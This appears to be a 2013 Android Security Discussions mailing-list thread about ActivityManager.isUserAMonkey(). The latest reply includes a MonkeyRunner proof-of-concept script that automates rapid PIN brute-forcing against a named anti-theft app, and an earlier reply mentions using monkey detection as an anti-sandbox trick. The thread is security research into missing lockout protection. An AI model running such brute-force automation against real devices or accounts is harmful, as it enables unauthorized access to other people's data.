Hi reox, thanks for the reply :) I should frame this problem a bit better; so here goes...
Recently I've been serveying some high-end apps on the PlayStore to see how well they protect against brute-force protection; and what I found was that a lot of the password manager and anti-theft apps actually don't have much protection at all i.e. if i can still successfully auth after submitting around 20-30 successively incorrect login attempts then there is no protection. So the next challenge was to find a way to rapidly and programmatically submit login attempts to the apps; the answer I came up with was to abuse abuse the MonkeyRunner framework, here's a PoC I whipped up against the Kaspersky anti-theft app: " from com.android.monkeyrunner import MonkeyRunner,MonkeyDevice device = MonkeyRunner.waitForConnection() valid_login = "12345" #do hoards of incorrect login attempts, and hope to get locked out or CAPTHA'd for attempt in *list_of_pins:* #set this for about a 100 rapid attempts device.type(attempt) #type pin into textbox, its the only editText and it grabs focus so I don't need to know its screen position device.touch(360,366,"DOWN") #press the "Sign in button and wait for the magic..." #submit a valid login attempt and see if we can actually still auth device.type(valid_login) #<--- valid login device.touch(360,366,"DOWN") " #the above code is configured to work on a Samsung S3, I imagine the last touch input co-ords would be set differently per device depending on screen-size and orientation So would be fair to say then, that developers should make use of this call, if components of their applications that handle "Login/Authentication" services/actions don't properly protect against brute-force attacks, given that the MonkeyRunner can be abused in the following way? On Wednesday, August 7, 2013 9:55:54 AM UTC+2, reox wrote: > > I think the Problem could be that most automated sandboxes use the monkey > to trigger malicious behaviour. So this would be a perfect anti-vm > technique. > > Oliver Hill <olly....@gmail.com <javascript:>> schrieb: > > As far as I can tell, isUserAMonkey() is used to stop the Monkey doing > something bad during the test, like encrypting the phone or setting up a > lock screen: in those cases, it just says "the button was pressed > successfully" but doesn't actually carry out the action. > > I don't think it really has any actual security implications at all, it's > just used to stop the monkey doing something stupid. I'm not sure what you > mean about trusting input: are you thinking someone might fake being a > monkey? > > On Monday, 5 August 2013 20:17:47 UTC+1, Keith Makan wrote: >> >> >> Hi Guys, >> >> I've been wondering about this strange method in the ActivityManager >> Class >> ActivityManager.isUserAMonkey()<http://developer.android.com/reference/android/app/ActivityManager.html#isUserAMonkey()> >> Relax, I know what's for, basically to make sure that an application can >> differentiate between touch, text or other input coming >> from the user and input coming from the MonkeyRunner testing Framework. >> Lately I've been testing a couple very popular apps for this though >> no one really seems to care 0_o... >> >> *My question is,* are there any security related concerns/issues around >> not making this call, before trusting input too much? >> >> Regards and Thanks >> k3 >> > -- > You received this message because you are subscribed to the Google Groups > "Android Security Discussions" group. > > To post to this group, send email to > android-secu...@googlegroups.com<javascript:> > . > Visit this group at > http://groups.google.com/group/android-security-discuss. > For more options, visit https://groups.google.com/groups/opt_out. > > > -- You received this message because you are subscribed to the Google Groups "Android Security Discussions" group. To unsubscribe from this group and stop receiving emails from it, send an email to android-security-discuss+unsubscr...@googlegroups.com. To post to this group, send email to android-security-discuss@googlegroups.com. Visit this group at http://groups.google.com/group/android-security-discuss. For more options, visit https://groups.google.com/groups/opt_out.
